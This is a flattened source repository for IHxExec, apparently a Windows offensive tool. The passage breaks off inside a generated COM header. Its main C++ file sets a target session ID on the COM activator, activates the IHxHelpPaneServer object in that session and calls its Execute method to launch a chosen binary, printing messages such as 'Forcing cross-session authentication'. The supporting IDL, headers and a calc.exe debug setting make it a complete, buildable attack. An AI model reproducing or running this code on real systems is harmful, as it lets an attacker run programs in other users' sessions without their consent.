├── .gitignore ├── Code └── IHxExec │ ├── IHxExec.sln │ └── IHxExec │ ├── IHxExec.cpp │ ├── IHxExec.h │ ├── IHxExec.vcxproj │ ├── IHxExec.vcxproj.filters │ ├── IHxExec.vcxproj.user │ ├── IStandardActivator.idl │ ├── IStandardActivator_h.h │ ├── IStandardActivator_i.c │ ├── IStandardActivator_p.c │ ├── argparse.cpp │ ├── argparse.h │ └── dlldata.c ├── README.md └── demo.mkv /.gitignore: -------------------------------------------------------------------------------- 1 | .vs 2 | Debug 3 | x64 4 | Release 5 | -------------------------------------------------------------------------------- /Code/IHxExec/IHxExec.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 17 4 | VisualStudioVersion = 17.7.34009.444 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "IHxExec", "IHxExec\IHxExec.vcxproj", "{D5092358-F3AB-4712-9C7F-D9EC4390193C}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|x64 = Debug|x64 11 | Debug|x86 = Debug|x86 12 | Release|x64 = Release|x64 13 | Release|x86 = Release|x86 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {D5092358-F3AB-4712-9C7F-D9EC4390193C}.Debug|x64.ActiveCfg = Debug|x64 17 | {D5092358-F3AB-4712-9C7F-D9EC4390193C}.Debug|x64.Build.0 = Debug|x64 18 | {D5092358-F3AB-4712-9C7F-D9EC4390193C}.Debug|x86.ActiveCfg = Debug|Win32 19 | {D5092358-F3AB-4712-9C7F-D9EC4390193C}.Debug|x86.Build.0 = Debug|Win32 20 | {D5092358-F3AB-4712-9C7F-D9EC4390193C}.Release|x64.ActiveCfg = Release|x64 21 | {D5092358-F3AB-4712-9C7F-D9EC4390193C}.Release|x64.Build.0 = Release|x64 22 | {D5092358-F3AB-4712-9C7F-D9EC4390193C}.Release|x86.ActiveCfg = Release|Win32 23 | {D5092358-F3AB-4712-9C7F-D9EC4390193C}.Release|x86.Build.0 = Release|Win32 24 | EndGlobalSection 25 | GlobalSection(SolutionProperties) = preSolution 26 | HideSolutionNode = FALSE 27 | EndGlobalSection 28 | GlobalSection(ExtensibilityGlobals) = postSolution 29 | SolutionGuid = {3FE9C4D3-BF4A-4A66-AF17-0EB1E78F1D4C} 30 | EndGlobalSection 31 | EndGlobal 32 | -------------------------------------------------------------------------------- /Code/IHxExec/IHxExec/IHxExec.cpp: -------------------------------------------------------------------------------- 1 | #include "IHxExec.h" 2 | #include "argparse.h" 3 | #include "IStandardActivator_h.h" 4 | 5 | struct __declspec(uuid("{8cec592c-07a1-11d9-b15e-000d56bfe6ee}")) 6 | IHxHelpPaneServer : public IUnknown { 7 | virtual HRESULT __stdcall DisplayTask(PWCHAR) = 0; 8 | virtual HRESULT __stdcall DisplayContents(PWCHAR) = 0; 9 | virtual HRESULT __stdcall DisplaySearchResults(PWCHAR) = 0; 10 | virtual HRESULT __stdcall Execute(const PWCHAR) = 0; 11 | }; 12 | 13 | DWORD Win32FromHResult(HRESULT Result) 14 | { 15 | if ((Result & 0xFFFF0000) == MAKE_HRESULT(SEVERITY_ERROR, FACILITY_WIN32, 0)) 16 | return HRESULT_CODE(Result); 17 | 18 | if (Result == S_OK) 19 | return ERROR_SUCCESS; 20 | 21 | return ERROR_CAN_NOT_COMPLETE; 22 | } 23 | 24 | HRESULT CoInitializeIHxHelpIds(LPGUID Clsid, LPGUID Iid) 25 | { 26 | HRESULT Result = S_OK; 27 | 28 | if (!SUCCEEDED(Result = CLSIDFromString(L"{8cec58ae-07a1-11d9-b15e-000d56bfe6ee}", Clsid))) 29 | return Result; 30 | 31 | if (!SUCCEEDED(Result = CLSIDFromString(L"{8cec592c-07a1-11d9-b15e-000d56bfe6ee}", Iid))) 32 | return Result; 33 | 34 | return Result; 35 | } 36 | 37 | void EnsureFileProtocol(wchar_t*& url) 38 | { 39 | const wchar_t* prefix = L"file:///"; 40 | size_t prefix_len = wcslen(prefix); 41 | size_t url_len = wcslen(url); 42 | 43 | if (url_len < prefix_len || wcsncmp(url, prefix, prefix_len) != 0) 44 | { 45 | size_t new_len = prefix_len + url_len + 1; 46 | wchar_t* new_url = new wchar_t[new_len]; 47 | wcscpy_s(new_url, new_len, prefix); 48 | wcscat_s(new_url, new_len, url); 49 | 50 | url = new_url; 51 | } 52 | } 53 | 54 | void ShowHelp() 55 | { 56 | std::wcerr << L"Usage: IHxExec.exe -s -c " << std::endl; 57 | std::wcerr << L"Usage: IHxExec.exe -s 1 -c C:/Windows/SYSTEM32/CALC.EXE" << std::endl; 58 | } 59 | 60 | int wmain(int argc, wchar_t* argv[]) 61 | { 62 | if (argc < 2) 63 | { 64 | ShowHelp(); 65 | return 1; 66 | } 67 | 68 | wchar_t* pcUrl = getCmdOption(argv, argv + argc, L"-c"); 69 | wchar_t* wsess = getCmdOption(argv, argv + argc, L"-s"); 70 | 71 | if (!pcUrl || !wsess) 72 | { 73 | ShowHelp(); 74 | return 1; 75 | } 76 | 77 | EnsureFileProtocol(pcUrl); 78 | DWORD session = std::stoi(wsess); 79 | 80 | GUID CLSID_IHxHelpPaneServer; 81 | GUID IID_IHxHelpPaneServer; 82 | HRESULT hr = S_OK; 83 | 84 | if (!SUCCEEDED(hr = CoInitializeIHxHelpIds(&CLSID_IHxHelpPaneServer, &IID_IHxHelpPaneServer))) 85 | return Win32FromHResult(hr); 86 | 87 | if (!SUCCEEDED(hr = CoInitializeEx(NULL, COINIT_MULTITHREADED))) 88 | return Win32FromHResult(hr); 89 | 90 | std::wcout << L"[*] Forcing cross-session authentication" << std::endl; 91 | 92 | GUID run = { 0x8cec592c, 0x07a1, 0x11d9, { 0xb1, 0x5e, 0x00, 0x0d, 0x56, 0xbf, 0xe6, 0xee } }; 93 | GUID CLSID_ComActivator = { 0x0000033C, 0x0000, 0x0000, { 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46 } }; 94 | GUID IID_IStandardActivator = __uuidof(IStandardActivator); 95 | IStandardActivator* pComAct; 96 | 97 | hr = CoCreateInstance(CLSID_ComActivator, NULL, CLSCTX_INPROC_SERVER, IID_IStandardActivator, (void**)&pComAct); 98 | if (FAILED(hr)) 99 | { 100 | std::wcout << L"[-] Cant get IStandartActivator" << std::endl; 101 | return Win32FromHResult(hr); 102 | } 103 | 104 | ISpecialSystemProperties* pSpecialProperties; 105 | hr = pComAct->QueryInterface(IID_ISpecialSystemProperties, (void**)&pSpecialProperties); 106 | if (FAILED(hr)) 107 | { 108 | std::wcout << L"[-] Cant get ISpecialSystemProperties" << std::endl; 109 | return Win32FromHResult(hr); 110 | } 111 | 112 | pSpecialProperties->SetSessionId(session, 0, 1); 113 | if (FAILED(hr)) 114 | { 115 | std::wcout << L"[-] Cant set session ID" << std::endl; 116 | return Win32FromHResult(hr); 117 | } 118 | 119 | std::wcout << L"[*] Spawning COM object in the session:" << session << std::endl; 120 | 121 | MULTI_QI qis[1]; 122 | qis[0].pIID = &run; 123 | qis[0].pItf = NULL; 124 | qis[0].hr = 0; 125 | 126 | hr = pComAct->StandardCreateInstance(CLSID_IHxHelpPaneServer, NULL, CLSCTX_ALL, NULL, 1, qis); 127 | 128 | if (FAILED(hr)) 129 | { 130 | std::wcout << L"[-] CoCreateInstanceFailed()" << std::endl; 131 | return Win32FromHResult(hr); 132 | } 133 | 134 | IHxHelpPaneServer* pIHxHelpPaneServer = NULL; 135 | pIHxHelpPaneServer = static_cast(qis[0].pItf); 136 | 137 | std::wcout << L"[+] Executing binary: " << pcUrl << std::endl; 138 | hr = pIHxHelpPaneServer->Execute(pcUrl); 139 | if (FAILED(hr)) 140 | { 141 | std::wcout << L"[-] pIHxHelpPaneServer->Execute() failed" << std::endl; 142 | return Win32FromHResult(hr); 143 | } 144 | 145 | if (pComAct) 146 | { 147 | pComAct->Release(); 148 | } 149 | 150 | if (pSpecialProperties) 151 | { 152 | pSpecialProperties->Release(); 153 | } 154 | 155 | if (pIHxHelpPaneServer) { 156 | pIHxHelpPaneServer->Release(); 157 | } 158 | 159 | CoUninitialize(); 160 | 161 | return Win32FromHResult(hr); 162 | } -------------------------------------------------------------------------------- /Code/IHxExec/IHxExec/IHxExec.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include 3 | #include 4 | #include 5 | #include -------------------------------------------------------------------------------- /Code/IHxExec/IHxExec/IHxExec.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 17.0 23 | Win32Proj 24 | {d5092358-f3ab-4712-9c7f-d9ec4390193c} 25 | IHxExec 26 | 10.0 27 | 28 | 29 | 30 | Application 31 | true 32 | v143 33 | Unicode 34 | 35 | 36 | Application 37 | false 38 | v143 39 | true 40 | Unicode 41 | 42 | 43 | Application 44 | true 45 | v143 46 | Unicode 47 | 48 | 49 | Application 50 | false 51 | v143 52 | true 53 | Unicode 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | Level3 76 | true 77 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 78 | true 79 | 80 | 81 | Console 82 | true 83 | 84 | 85 | 86 | 87 | Level3 88 | true 89 | true 90 | true 91 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 92 | true 93 | 94 | 95 | Console 96 | true 97 | true 98 | true 99 | 100 | 101 | 102 | 103 | Level3 104 | true 105 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 106 | true 107 | 108 | 109 | Console 110 | true 111 | 112 | 113 | 114 | 115 | Level3 116 | true 117 | true 118 | true 119 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 120 | true 121 | 122 | 123 | Console 124 | true 125 | true 126 | true 127 | 128 | 129 | 130 | 131 | 132 | 133 | 134 | 135 | 136 | 137 | 138 | 139 | 140 | 141 | 142 | 143 | -------------------------------------------------------------------------------- /Code/IHxExec/IHxExec/IHxExec.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Исходные файлы 20 | 21 | 22 | Исходные файлы 23 | 24 | 25 | 26 | 27 | Файлы заголовков 28 | 29 | 30 | Файлы заголовков 31 | 32 | 33 | 34 | 35 | Файлы заголовков 36 | 37 | 38 | -------------------------------------------------------------------------------- /Code/IHxExec/IHxExec/IHxExec.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | -s 1 -c C:/Windows/SYSTEM32/CALC.EXE 5 | WindowsLocalDebugger 6 | 7 | -------------------------------------------------------------------------------- /Code/IHxExec/IHxExec/IStandardActivator.idl: -------------------------------------------------------------------------------- 1 | import "oaidl.idl"; 2 | import "ocidl.idl"; 3 | 4 | [ 5 | object, 6 | local, 7 | uuid(000001b8-0000-0000-C000-000000000046), 8 | pointer_default(unique) 9 | ] 10 | interface IStandardActivator : IUnknown 11 | { 12 | HRESULT StandardGetClassObject([in] REFCLSID rclsid, 13 | [in] DWORD dwClsCtx, 14 | [in] COSERVERINFO* pServerInfo, 15 | [in] REFIID riid, 16 | [out, iid_is(riid)] void** ppv); 17 | 18 | HRESULT StandardCreateInstance([in] REFCLSID Clsid, 19 | [in] IUnknown* punkOuter, 20 | [in] DWORD dwClsCtx, 21 | [in] COSERVERINFO* pServerInfo, 22 | [in] DWORD dwCount, 23 | [in, size_is(dwCount)] MULTI_QI* pResults); 24 | 25 | HRESULT StandardGetInstanceFromFile( 26 | [in] COSERVERINFO* pServerInfo, 27 | [in] CLSID* pclsidOverride, 28 | [in] IUnknown* punkOuter, 29 | [in] DWORD dwClsCtx, 30 | [in] DWORD grfMode, 31 | [in] OLECHAR* pwszName, 32 | [in] DWORD dwCount, 33 | [in, size_is(dwCount)] MULTI_QI* pResults); 34 | 35 | HRESULT StandardGetInstanceFromIStorage( 36 | [in] COSERVERINFO* pServerInfo, 37 | [in] CLSID* pclsidOverride, 38 | [in] IUnknown* punkOuter, 39 | [in] DWORD dwClsCtx, 40 | [in] IStorage* pstg, 41 | [in] DWORD dwCount, 42 | [in, size_is(dwCount)] MULTI_QI* pResults); 43 | 44 | HRESULT Reset(); 45 | } 46 | 47 | [ 48 | object, 49 | local, 50 | uuid(000001b9-0000-0000-C000-000000000046), 51 | pointer_default(unique) 52 | ] 53 | interface ISpecialSystemProperties : IUnknown 54 | { 55 | HRESULT SetSessionId([in] ULONG dwSessionId, [in]BOOL bUseConsole, [in] BOOL fRemoteThisSessionId); 56 | HRESULT GetSessionId([out] ULONG* pdwSessionId, [out]BOOL* pbUseConsole); 57 | HRESULT GetSessionId2([out] ULONG* pdwSessionId, [out]BOOL* pbUseConsole, [out] BOOL* pfRemoteThisSessionId); 58 | HRESULT SetClientImpersonating([in]BOOL fClientImpersonating); 59 | HRESULT GetClientImpersonating([out]BOOL* pfClientImpersonating); 60 | HRESULT SetPartitionId([in] REFGUID guidPartiton); 61 | HRESULT GetPartitionId([out] GUID* pguidPartiton); 62 | HRESULT SetProcessRequestType([in] DWORD dwPRT); 63 | HRESULT GetProcessRequestType([out] DWORD* pdwPRT); 64 | HRESULT SetOrigClsctx([in] DWORD dwClsctx); 65 | HRESULT GetOrigClsctx([out] DWORD* dwClsctx); 66 | HRESULT GetDefaultAuthenticationLevel([out] DWORD* pdwAuthnLevel); 67 | HRESULT SetDefaultAuthenticationLevel([in] DWORD dwAuthnLevel); 68 | } 69 | -------------------------------------------------------------------------------- /Code/IHxExec/IHxExec/IStandardActivator_h.h: -------------------------------------------------------------------------------- 1 | 2 | 3 | /* this ALWAYS GENERATED file contains the definitions for the interfaces */ 4 | 5 | 6 | /* File created by MIDL compiler version 8.01.0626 */ 7 | /* at Tue Jan 19 08:14:07 2038 8 | */ 9 | /* Compiler settings for IStandardActivator.idl: 10 | Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0626 11 | protocol : all , ms_ext, c_ext, robust 12 | error checks: allocation ref bounds_check enum stub_data 13 | VC __declspec() decoration level: 14 | __declspec(uuid()), __declspec(selectany), __declspec(novtable) 15 | DECLSPEC_UUID(), MIDL_INTERFACE() 16 | */ 17 | /* @@MIDL_FILE_HEADING( ) */ 18 | 19 | 20 | 21 | /* verify that the version is high enough to compile this file*/ 22 | #ifndef __REQUIRED_RPCNDR_H_VERSION__ 23 | #define __REQUIRED_RPCNDR_H_VERSION__ 500 24 | #endif 25 | 26 | #include "rpc.h" 27 | #include "rpcndr.h" 28 | 29 | #ifndef __RPCNDR_H_VERSION__ 30 | #error this stub requires an updated version of 31 | #endif /* __RPCNDR_H_VERSION__ */ 32 | 33 | #ifndef COM_NO_WINDOWS_H 34 | #include "windows.h" 35 | #include "ole2.h" 36 | #endif /*COM_NO_WINDOWS_H*/ 37 | 38 | #ifndef __IStandardActivator_h_h__ 39 | #define __IStandardActivator_h_h__ 40 | 41 | #if defined(_MSC_VER) && (_MSC_VER >= 1020) 42 | #pragma once 43 | #endif 44 | 45 | #ifndef DECLSPEC_XFGVIRT 46 | #if _CONTROL_FLOW_GUARD_XFG 47 | #define DECLSPEC_XFGVIRT(base, func) __declspec(xfg_virtual(base, func)) 48 | #else 49 | #define DECLSPEC_XFGVIRT(base, func) 50 | #endif 51 | #endif 52 | 53 | /* Forward Declarations */ 54 | 55 | #ifndef __IStandardActivator_FWD_DEFINED__ 56 | #define __IStandardActivator_FWD_DEFINED__ 57 | typedef interface IStandardActivator IStandardActivator; 58 | 59 | #endif /* __IStandardActivator_FWD_DEFINED__ */ 60 | 61 | 62 | #ifndef __ISpecialSystemProperties_FWD_DEFINED__ 63 | #define __ISpecialSystemProperties_FWD_DEFINED__ 64 | typedef interface ISpecialSystemProperties ISpecialSystemProperties; 65 | 66 | #endif /* __ISpecialSystemProperties_FWD_DEFINED__ */ 67 | 68 | 69 | /* header files for imported files */ 70 | #include "oaidl.h" 71 | #include "ocidl.h" 72 | 73 | #ifdef __cplusplus 74 | extern "C"{ 75 | #endif 76 | 77 | 78 | #ifndef __IStandardActivator_INTERFACE_DEFINED__ 79 | #define __IStandardActivator_INTERFACE_DEFINED__ 80 | 81 | /* interface IStandardActivator */ 82 | /* [unique][uuid][local][object] */ 83 | 84 | 85 | EXTERN_C const IID IID_IStandardActivator; 86 | 87 | #if defined(__cplusplus) && !defined(CINTERFACE) 88 | 89 | MIDL_INTERFACE("000001b8-0000-0000-C000-000000000046") 90 | IStandardActivator : public IUnknown 91 | { 92 | public: 93 | virtual HRESULT STDMETHODCALLTYPE StandardGetClassObject( 94 | /* [in] */ REFCLSID rclsid, 95 | /* [in] */ DWORD dwClsCtx, 96 | /* [in] */ COSERVERINFO *pServerInfo, 97 | /* [in] */ REFIID riid, 98 | /* [iid_is][out] */ void **ppv) = 0; 99 | 100 | virtual HRESULT STDMETHODCALLTYPE StandardCreateInstance( 101 | /* [in] */ REFCLSID Clsid, 102 | /* [in] */ IUnknown *punkOuter, 103 | /* [in] */ DWORD dwClsCtx, 104 | /* [in] */ COSERVERINFO *pServerInfo, 105 | /* [in] */ DWORD dwCount, 106 | /* [size_is][in] */ MULTI_QI *pResults) = 0; 107 | 108 | virtual HRESULT STDMETHODCALLTYPE StandardGetInstanceFromFile( 109 | /* [in] */ COSERVERINFO *pServerInfo, 110 | /* [in] */ CLSID *pclsidOverride, 111 | /* [in] */ IUnknown *punkOuter, 112 | /* [in] */ DWORD dwClsCtx, 113 | /* [in] */ DWORD grfMode, 114 | /* [in] */ OLECHAR *pwszName, 115 | /* [in] */ DWORD dwCount, 116 | /* [size_is][in] */ MULTI_QI *pResults) = 0; 117 | 118 | virtual HRESULT STDMETHODCALLTYPE StandardGetInstanceFromIStorage( 119 | /* [in] */ COSERVERINFO *pServerInfo, 120 | /* [in] */ CLSID *pclsidOverride, 121 | /* [in] */ IUnknown *punkOuter, 122 | /* [in] */ DWORD dwClsCtx, 123 | /* [in] */ IStorage *pstg, 124 | /* [in] */ DWORD dwCount, 125 | /* [size_is][in] */ MULTI_QI *pResults) = 0; 126 | 127 | virtual HRESULT STDMETHODCALLTYPE Reset( void) = 0; 128 | 129 | }; 130 | 131 | 132 | #else /* C style interface */ 133 | 134 | typedef struct IStandardActivatorVtbl 135 | { 136 | BEGIN_INTERFACE 137 | 138 | DECLSPEC_XFGVIRT(IUnknown, QueryInterface) 139 | HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 140 | IStandardActivator * This, 141 | /* [in] */ REFIID riid, 142 | /* [annotation][iid_is][out] */ 143 | _COM_Outptr_ void **ppvObject); 144 | 145 | DECLSPEC_XFGVIRT(IUnknown, AddRef) 146 | ULONG ( STDMETHODCALLTYPE *AddRef )( 147 | IStandardActivator * This); 148 | 149 | DECLSPEC_XFGVIRT(IUnknown, Release) 150 | ULONG ( STDMETHODCALLTYPE *Release )( 151 | IStandardActivator * This); 152 | 153 | DECLSPEC_XFGVIRT(IStandardActivator, StandardGetClassObject) 154 | HRESULT ( STDMETHODCALLTYPE *StandardGetClassObject )( 155 | IStandardActivator * This, 156 | /* [in] */ REFCLSID rclsid, 157 | /* [in] */ DWORD dwClsCtx, 158 | /* [in] */ COSERVERINFO *pServerInfo, 159 | /* [in] */ REFIID riid, 160 | /* [iid_is][out] */ void **ppv); 161 | 162 | DECLSPEC_XFGVIRT(IStandardActivator, StandardCreateInstance) 163 | HRESULT ( STDMETHODCALLTYPE *StandardCreateInstance )( 164 | IStandardActivator * This, 165 | /* [in] */ REFCLSID Clsid, 166 | /* [in] */ IUnknown *punkOuter, 167 | /* [in] */ DWORD dwClsCtx, 168 | /* [in] */ COSERVERINFO *pServerInfo, 169 | /* [in] */ DWORD dwCount, 170 | /* [size_is][in] */ MULTI_QI *pResults); 171 | 172 | DECLSPEC_XFGVIRT(IStandardActivator, StandardGetInstanceFromFile) 173 | HRESULT ( STDMETHODCALLTYPE *StandardGetInstanceFromFile )( 174 | IStandardActivator * This, 175 | /* [in] */ COSERVERINFO *pServerInfo, 176 | /* [in] */ CLSID *pclsidOverride, 177 | /* [in] */ IUnknown *punkOuter, 178 | /* [in] */ DWORD dwClsCtx, 179 | /* [in] */ DWORD grfMode, 180 | /* [in] */ OLECHAR *pwszName, 181 | /* [in] */ DWORD dwCount, 182 | /* [size_is][in] */ MULTI_QI *pResults); 183 | 184 | DECLSPEC_XFGVIRT(IStandardActivator, StandardGetInstanceFromIStorage) 185 | HRESULT ( STDMETHODCALLTYPE *StandardGetInstanceFromIStorage )( 186 | IStandardActivator * This, 187 | /* [in] */ COSERVERINFO *pServerInfo, 188 | /* [in] */ CLSID *pclsidOverride, 189 | /* [in] */ IUnknown *punkOuter, 190 | /* [in] */ DWORD dwClsCtx, 191 | /* [in] */ IStorage *pstg, 192 | /* [in] */ DWORD dwCount, 193 | /* [size_is][in] */ MULTI_QI *pResults); 194 | 195 | DECLSPEC_XFGVIRT(IStandardActivator, Reset) 196 | HRESULT ( STDMETHODCALLTYPE *Reset )( 197 | IStandardActivator * This); 198 | 199 | END_INTERFACE 200 | } IStandardActivatorVtbl; 201 | 202 | interface IStandardActivator 203 | { 204 | CONST_VTBL struct IStandardActivatorVtbl *lpVtbl; 205 | }; 206 | 207 | 208 | 209 | #ifdef COBJMACROS 210 | 211 | 212 | #define IStandardActivator_QueryInterface(This,riid,ppvObject) \ 213 | ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 214 | 215 | #define IStandardActivator_AddRef(This) \ 216 | ( (This)->lpVtbl -> AddRef(This) ) 217 | 218 | #define IStandardActivator_Release(This) \ 219 | ( (This)->lpVtbl -> Release(This) ) 220 | 221 | 222 | #define IStandardActivator_StandardGetClassObject(This,rclsid,dwClsCtx,pServerInfo,riid,ppv) \ 223 | ( (This)->lpVtbl -> StandardGetClassObject(This,rclsid,dwClsCtx,pServerInfo,riid,ppv) ) 224 | 225 | #define IStandardActivator_StandardCreateInstance(This,Clsid,punkOuter,dwClsCtx,pServerInfo,dwCount,pResults) \ 226 | ( (This)->lpVtbl -> StandardCreateInstance(This,Clsid,punkOuter,dwClsCtx,pServerInfo,dwCount,pResults) ) 227 | 228 | #define IStandardActivator_StandardGetInstanceFromFile(This,pServerInfo,pclsidOverride,punkOuter,dwClsCtx,grfMode,pwszName,dwCount,pResults) \ 229 | ( (This)->lpVtbl -> StandardGetInstanceFromFile(This,pServerInfo,pclsidOverride,punkOuter,dwClsCtx,grfMode,pwszName,dwCount,pResults) ) 230 | 231 | #define IStandardActivator_StandardGetInstanceFromIStorage(This,pServerInfo,pclsidOverride,punkOuter,dwClsCtx,pstg,dwCount,pResults) \ 232 | ( (This)->lpVtbl -> StandardGetInstanceFromIStorage(This,pServerInfo,pclsidOverride,punkOuter,dwClsCtx,pstg,dwCount,pResults) ) 233 | 234 | #define IStandardActivator_Reset(This) \ 235 | ( (This)->lpVtbl -> Reset(This) ) 236 | 237 | #endif /* COBJMACROS */ 238 | 239 | 240 | #endif /* C style interface */ 241 | 242 | 243 | 244 | 245 | #endif /* __IStandardActivator_INTERFACE_DEFINED__ */ 246 | 247 | 248 | #ifndef __ISpecialSystemProperties_INTERFACE_DEFINED__ 249 | #define __ISpecialSystemProperties_INTERFACE_DEFINED__ 250 | 251 | /* interface ISpecialSystemProperties */ 252 | /* [unique][uuid][local][object] */ 253 | 254 | 255 | EXTERN_C const IID IID_ISpecialSystemProperties; 256 | 257 | #if defined(__cplusplus) && !defined(CINTERFACE) 258 | 259 | MIDL_INTERFACE("000001b9-0000-0000-C000-000000000046") 260 | ISpecialSystemProperties : public IUnknown 261 | { 262 | public: 263 | virtual HRESULT STDMETHODCALLTYPE SetSessionId( 264 | /* [in] */ ULONG dwSessionId, 265 | /* [in] */ BOOL bUseConsole, 266 | /* [in] */ BOOL fRemoteThisSessionId) = 0; 267 | 268 | virtual HRESULT STDMETHODCALLTYPE GetSessionId( 269 | /* [out] */ ULONG *pdwSessionId, 270 | /* [out] */ BOOL *pbUseConsole) = 0; 271 | 272 | virtual HRESULT STDMETHODCALLTYPE GetSessionId2( 273 | /* [out] */ ULONG *pdwSessionId, 274 | /* [out] */ BOOL *pbUseConsole, 275 | /* [out] */ BOOL *pfRemoteThisSessionId) = 0; 276 | 277 | virtual HRESULT STDMETHODCALLTYPE SetClientImpersonating( 278 | /* [in] */ BOOL fClientImpersonating) = 0; 279 | 280 | virtual HRESULT STDMETHODCALLTYPE GetClientImpersonating( 281 | /* [out] */ BOOL *pfClientImpersonating) = 0; 282 | 283 | virtual HRESULT STDMETHODCALLTYPE SetPartitionId( 284 | /* [in] */ REFGUID guidPartiton) = 0; 285 | 286 | virtual HRESULT STDMETHODCALLTYPE GetPartitionId( 287 | /* [out] */ GUID *pguidPartiton) = 0; 288 | 289 | virtual HRESULT STDMETHODCALLTYPE SetProcessRequestType( 290 | /* [in] */ DWORD dwPRT) = 0; 291 | 292 | virtual HRESULT STDMETHODCALLTYPE GetProcessRequestType( 293 | /* [out] */ DWORD *pdwPRT) = 0; 294 | 295 | virtual HRESULT STDMETHODCALLTYPE SetOrigClsctx( 296 | /* [in] */ DWORD dwClsctx) = 0; 297 | 298 | virtual HRESULT STDMETHODCALLTYPE GetOrigClsctx( 299 | /* [out] */ DWORD *dwClsctx) = 0; 300 | 301 | virtual HRESULT STDMETHODCALLTYPE GetDefaultAuthenticationLevel( 302 | /* [out] */ DWORD *pdwAuthnLevel) = 0; 303 | 304 | virtual HRESULT STDMETHODCALLTYPE SetDefaultAuthenticationLevel( 305 | /* [in] */ DWORD dwAuthnLevel) = 0; 306 | 307 | }; 308 | 309 | 310 | #else /* C style interface */ 311 | 312 | typedef struct ISpecialSystemPropertiesVtbl 313 | { 314 | BEGIN_INTERFACE 315 | 316 | DECLSPEC_XFGVIRT(IUnknown, QueryInterface) 317 | HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 318 | ISpecialSystemProperties * This, 319 | /* [in] */ REFIID riid, 320 | /* [annotation][iid_is][out] */ 321 | _COM_Outptr_ void **ppvObject); 322 | 323 | DECLSPEC_XFGVIRT(IUnknown, AddRef) 324 | ULONG ( STDMETHODCALLTYPE *AddRef )( 325 | ISpecialSystemProperties * This); 326 | 327 | DECLSPEC_XFGVIRT(IUnknown, Release) 328 | ULONG ( STDMETHODCALLTYPE *Release )( 329 | ISpecialSystemProperties * This); 330 | 331 | DECLSPEC_XFGVIRT(ISpecialSystemProperties, SetSessionId) 332 | HRESULT ( STDMETHODCALLTYPE *SetSessionId )( 333 | ISpecialSystemProperties * This, 334 | /* [in] */ ULONG dwSessionId, 335 | /* [in] */ BOOL bUseConsole, 336 | /* [in] */ BOOL fRemoteThisSessionId); 337 | 338 | DECLSPEC_XFGVIRT(ISpecialSystemProperties, GetSessionId) 339 | HRESULT ( STDMETHODCALLTYPE *GetSessionId )( 340 | ISpecialSystemProperties * This, 341 | /* [out] */ ULONG *pdwSessionId, 342 | /* [out] */ BOOL *pbUseConsole); 343 | 344 | DECLSPEC_XFGVIRT(ISpecialSystemProperties, GetSessionId2) 345 | HRESULT ( STDMETHODCALLTYPE *GetSessionId2 )( 346 | ISpecialSystemProperties * This, 347 | /* [out] */ ULONG *pdwSessionId, 348 | /* [out] */ BOOL *pbUseConsole, 349 | /* [out] */ BOOL *pfRemoteThisSessionId); 350 | 351 | DECLSPEC_XFGVIRT(ISpecialSystemProperties, SetClientImpersonating) 352 | HRESULT ( STDMETHODCALLTYPE *SetClientImpersonating )( 353 | ISpecialSystemProperties * This, 354 | /* [in] */ BOOL fClientImpersonating); 355 | 356 | DECLSPEC_XFGVIRT(ISpecialSystemProperties, GetClientImpersonating) 357 | HRESULT ( STDMETHODCALLTYPE *GetClientImpersonating )( 358 | ISpecialSystemProperties * This, 359 | /* [out] */ BOOL *pfClientImpersonating); 360 | 361 | DECLSPEC_XFGVIRT(ISpecialSystemProperties, SetPartitionId) 362 | HRESULT ( STDMETHODCALLTYPE *SetPartitionId )( 363 | ISpecialSystemProperties * This, 364 | /* [in] */ REFGUID guidPartiton); 365 | 366 | DECLSPEC_XFGVIRT(ISpecialSystemProperties, GetPartitionId) 367 | HRESULT ( STDMETHODCALLTYPE *GetPartitionId )( 368 | ISpecialSystemProperties * This, 369 | /* [out] */ GUID *pguidPartiton); 370 | 371 | DECLSPEC_XFGVIRT(ISpecialSystemProperties, SetProcessRequestType) 372 | HRESULT ( STDMETHODCALLTYPE *SetProcessRequestType )( 373 | ISpecialSystemProperties * This, 374 | /* [in] */ DWORD dwPRT); 375 | 376 | DECLSPEC_XFGVIRT(ISpecialSystemProperties, GetProcessRequestType) 377 | HRESULT ( STDMETHODCALLTYPE *GetProcessRequestType )( 378 | ISpecialSystemProperties * This, 379 | /* [out] */ DWORD *pdwPRT); 380 | 381 | DECLSPEC_XFGVIRT(ISpecialSystemProperties, SetOrigClsctx) 382 | HRESULT ( STDMETHODCALLTYPE 